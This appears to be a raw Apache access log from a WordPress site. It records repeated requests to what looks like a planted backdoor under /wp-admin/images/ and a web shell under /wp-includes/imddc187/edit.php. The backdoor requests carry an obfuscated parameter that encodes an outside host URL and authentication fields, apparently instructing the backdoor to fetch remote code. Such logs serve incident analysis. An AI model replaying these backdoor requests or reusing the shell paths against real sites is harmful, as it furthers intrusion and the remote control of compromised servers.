179.188.53.243 - - [15/Mar/2026:01:37:57 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333037372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393437372q6638616166613333303161663835623733316634323633653262343435636434222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [15/Mar/2026:01:43:01 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:01:38:19 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333039392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393439392q6165383136326136616262356634363239383833396532663731346565396537222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:42:03 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:38:40 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333132302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393532302q3265386566663134393561326232633564333535333933366430623261633064222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:39:01 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333134312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393534312q3561366330323432363134616332313436666238623564366431323738323166222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:39:22 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333136322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393536322q6564306635653539613362333362303663316461666463653730623032626137222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:39:43 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333138332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393538332q3465343963393062393132663730393337326464383839303763653033333035222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:43:35 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:40:05 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333230352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393630352q3265313430643932343539373231656136383636666464313939653161643434222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:40:26 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333232362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393632362q6532303833623439663633633933356539666163636162313630623636323731222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [15/Mar/2026:01:45:20 -0300] "GET /wp-includes/imddc187/edit.php HTTP/1.1" 200 6 "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
74.7.244.31 - - [15/Mar/2026:01:45:39 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:01:40:48 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333234382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393634382q6335326233366339376135383537353061333965393633656463306233323766222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:41:10 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333237302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393637302q6461306336626231653935366439653332346335616539616230656663363538222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
35.89.85.244 - - [15/Mar/2026:01:45:52 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
35.89.85.244 35.89.85.244 - - [15/Mar/2026:01:45:54 -0300] "GET / HTTP/1.1" 200 72780 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
35.89.85.244 - - [15/Mar/2026:01:46:11 -0300] "GET /robots.txt HTTP/1.1" 200 447 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.74.169 - - [15/Mar/2026:01:46:12 -0300] "GET /?y=bqm220tqxv24853vsczwobyo HTTP/1.1" 200 220537 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.74.160 - - [15/Mar/2026:01:46:23 -0300] "GET /?f=ndg136pc9427vtvvocf HTTP/1.1" 200 206918 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [15/Mar/2026:01:41:31 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333239312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393639312q3433373037313537366131323936303064666162333033656138373737666566222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:45:10 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:41:53 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333331332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393731332q6130653134343262656637346531376461373032393863323035333237333736222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:42:14 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333333342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393733342q6332316563396565653234653330323334313362623831356162313437353836222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:42:35 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333335352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393735352q3163623362383962613538663730316362363163373736393534666661666434222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:42:57 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333337372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393737372q6332663036636331376639313732303861653130643664303933396234656636222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:46:41 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:43:18 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333339382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393739382q3065363462616236353764363230363134393439353133343663636365363934222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [15/Mar/2026:01:48:23 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:01:43:41 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333432312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393832312q6530616636336466656563376239646163336266373134326462653437323436222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:44:02 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333434322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393834322q6337353333653838623962306632356662663032323038313661656564393962222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:44:23 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333436332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393836332q3937613433663365653034336661303231343632626431616136656633323965222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:48:14 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:44:44 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333438342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393838342q6565656233633230336136616637393830663232303666636438376635643666222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:45:05 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333530352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393930352q3264393035313862363064663065316332396532623965616265313238653131222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:45:26 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333532362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393932362q6630616337306666353530373635313366313265613339346234616130636435222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [15/Mar/2026:01:50:51 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:01:45:51 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333535312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393935312q6466346137663335306532666632313131343333356330356434323132316234222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:46:12 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333537322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393937322q3064643065633431313232623662326638636339613339366663386662613036222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:49:45 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:46:33 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333539332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333534393939332q3938376636616330623965386537633262373639333161373837646565633730222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:46:54 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333631342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303031342q3533323434303630323539343831313231393038353939303435356337636261222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:47:15 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333633352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303033352q3632343064333737303631396531643461393863646430363334353330333631222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:47:36 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333635362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303035362q3562316365376134333431373961383731343339626130373866373038313037222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:51:17 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:47:57 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333637372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303037372q6133376238626161303133633838636439323166386666303934653836623032222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:48:18 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333639382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303039382q6239643865363161333137336235383132316637633237643731643863373630222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
66.249.74.160 - - [15/Mar/2026:01:53:19 -0300] "GET /?i=eqcr174kv22263cqmwuva HTTP/1.1" 200 225298 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.228.16 - - [15/Mar/2026:01:53:28 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [15/Mar/2026:01:48:39 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333731392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303131392q3838333534336130396163616364333964343066663330326666653933323735222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:49:03 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333734332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303134332q6239353136383333373664393134633163396232373833653461336332396333222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [15/Mar/2026:01:52:48 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [15/Mar/2026:01:49:24 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333736342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303136342q6261666361643430353336383537633764623634646562303563326165346135222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:49:45 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333738352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303138352q3264313333373832333832663136353261386232646463666662366531356362222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:50:06 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333830362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303230362q3365633638383931313938343135363537356135643561336161346631633730222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [15/Mar/2026:01:50:27 -0300] "GET /wp-admin/images/images/images/index.php?ARRAY=7o2230223n313737333535333832372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333535303232372q6632393461613066353035363631653032396631643239303363356564303833222p2232223n226238366564353766366661616563396639656333303966623762363938626632222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232322q34362q35352q36392q37332q38342q3239227q HTTP/1.1" 504 247 "-" "-"
